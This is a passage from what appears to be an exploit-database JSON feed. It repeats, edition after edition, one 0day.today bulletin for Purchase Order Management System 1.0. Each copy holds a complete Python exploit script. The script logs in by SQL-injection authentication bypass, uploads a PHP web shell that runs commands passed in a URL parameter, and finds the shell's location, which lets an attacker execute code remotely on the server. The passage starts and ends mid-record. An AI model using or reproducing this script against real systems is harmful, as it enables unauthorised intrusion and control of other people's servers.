shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-16] #"}, "lastseen": "2021-09-15T22:46:58", "differentElements": ["sourceData"], "edition": 3}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "df532e2bed3c406f1481c18dd2aec346", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-16T22:55:18", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-16T22:55:18", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-16T22:55:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-17] #"}, "lastseen": "2021-09-16T22:55:18", "differentElements": ["sourceData"], "edition": 4}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "48416345745e3ec61f3b632859e520c2", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-20T20:43:25", "history": [], "viewCount": 34, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-16T22:55:18", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-16T22:55:18", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-20] #"}, "lastseen": "2021-09-20T20:43:25", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "38e695525e86e96a6b12a99b0210e2e5", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-21T00:40:24", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-21T00:40:24", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-21T00:40:24", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-21] #"}, "lastseen": "2021-09-21T00:40:24", "differentElements": ["sourceData"], "edition": 6}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "a34861df53f79a9e9b0bbadc7f10dc61", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-22T06:41:59", "history": [], "viewCount": 36, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-22T06:41:59", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-22T06:41:59", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-22] #"}, "lastseen": "2021-09-22T06:41:59", "differentElements": ["sourceData"], "edition": 7}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "eb79c56418022ea9b4faa98efc97e2d3", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-23T00:35:34", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-23T00:35:34", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-23T00:35:34", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"X-Requested-With\": \"XMLHttpRequest\", \"Content-Type\": \"multipart/form-data; boundary=---------------------------221231088029122460852571642112\", \"Origin\": \"http://localhost\", \"Connection\": \"close\", \"Referer\": \"http://localhost/leave_system/admin/?page=user\"}\r\n data = \"-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"id\\\"\\r\\n\\r\\n1\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"firstname\\\"\\r\\n\\r\\nAdminstrator\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"lastname\\\"\\r\\n\\r\\nAdmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"username\\\"\\r\\n\\r\\nadmin\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"password\\\"\\r\\n\\r\\n\\r\\n-----------------------------221231088029122460852571642112\\r\\nContent-Disposition: form-data; name=\\\"img\\\"; filename=\\\"\" + payload_name +\"\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n\\n \" + payload_file + \"\\n\\n\\r\\n-----------------------------221231088029122460852571642112--\\r\\n\"\r\n print('[*] Trying to shell...')\r\n time.sleep(2)\r\n\r\n try:\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Shell Uploaded!')\r\n upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)\r\n upload_check = f'{url}/uploads'\r\n r = requests.get(upload_check)\r\n if payload_name in r.text:\r\n \r\n payloads = r.text.split('<a href=\"')\r\n for load in payloads:\r\n\r\n if payload_name in load:\r\n payload = load.split('\"')\r\n payload = payload[0]\r\n else:\r\n pass\r\n else:\r\n exit()\r\n\r\n except:\r\n print (\"Upload failed try again\\n\")\r\n exit()\r\n\r\n try:\r\n print(\"Check Your Target ;)\\n\")\r\n\r\n\r\n except:\r\n print(\"Failed to find shell\\n\")\r\n \r\n else:\r\n print(\"Login failed!\\n\")\r\n\r\n except:\r\n print(\"Something Went Wrong!\\n\")\r\n \r\n#########################################################\r\n#FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir\n\n# 0day.today [2021-09-23] #"}, "lastseen": "2021-09-23T00:35:34", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-36751", "hash": "9486a69c7732e32b6b9bda7206c746f2", "type": "zdt", "bulletinFamily": "exploit", "title": "Purchase Order Management System 1.0 - Remote File Upload Exploit", "description": "", "published": "2021-09-14T00:00:00", "modified": "2021-09-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36751", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-09-23T22:34:09", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-09-23T22:34:09", "rev": 2}, "score": {"value": -0.3, "vector": "NONE", "modified": "2021-09-23T22:34:09", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36751", "sourceData": "# Exploit Title: Purchase Order Management System 1.0 - Remote File Upload\r\n# Exploit Author: Aryan Chehreghani\r\n# Vendor Homepage: https://www.sourcecodester.com\r\n# Software Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\r\n# Version: v1.0\r\n# Tested on: Windows 10 - XAMPP Server \r\n\r\n# [ About the Purchase Order Management System ] :\r\n#This Purchase Order Management System can store the list of all company's,\r\n#suppliers for easily retrieving the suppliers' data upon generating the purchase order.\r\n#It also stores the list of Items that the company possibly purchased from their suppliers.\r\n#Both the mentioned features have CRUD (Create, Read, Update, and Delete) operations. \r\n#Talking about generating the Purchase Order, the system can generate a printable Purchase Order Slip/Request.\r\n\r\n#!/bin/env python3\r\nimport requests\r\nimport time\r\nimport sys\r\nfrom colorama import Fore, Style\r\nif len(sys.argv) !=2:\r\n print ('''\r\n########################################################### \r\n#Purchase Order Management System 1.0 - Remote File Upload#\r\n# BY:Aryan Chehreghani #\r\n# Team:TAPESH DIGITAL SECURITY TEAM IRAN #\r\n# mail:[email\u00a0protected]\t # \r\n# -+-USE:python script.py <target url> # \r\n# [+]Example:python3 script.py http://127.0.0.1/ #\r\n###########################################################\r\n''')\r\nelse:\r\n try:\r\n url = sys.argv[1]\r\n print()\r\n print('[*] Trying to login...')\r\n time.sleep(1)\r\n login = url + '/classes/Login.php?f=login'\r\n payload_name = \"shell.php\"\r\n payload_file = r\"\"\"<?php @system($_GET['tapesh']); ?>\"\"\"\r\n session = requests.session()\r\n post_data = {\"username\": \"'=''or'\", \"password\": \"'=''or'\"}\r\n user_login = session.post(login, data=post_data)\r\n cookie = session.cookies.get_dict()\r\n\r\n if user_login.text == '{\"status\":\"success\"}':\r\n print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')\r\n upload_url = url + \"/classes/Users.php?f=save\"\r\n cookies = cookie\r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, 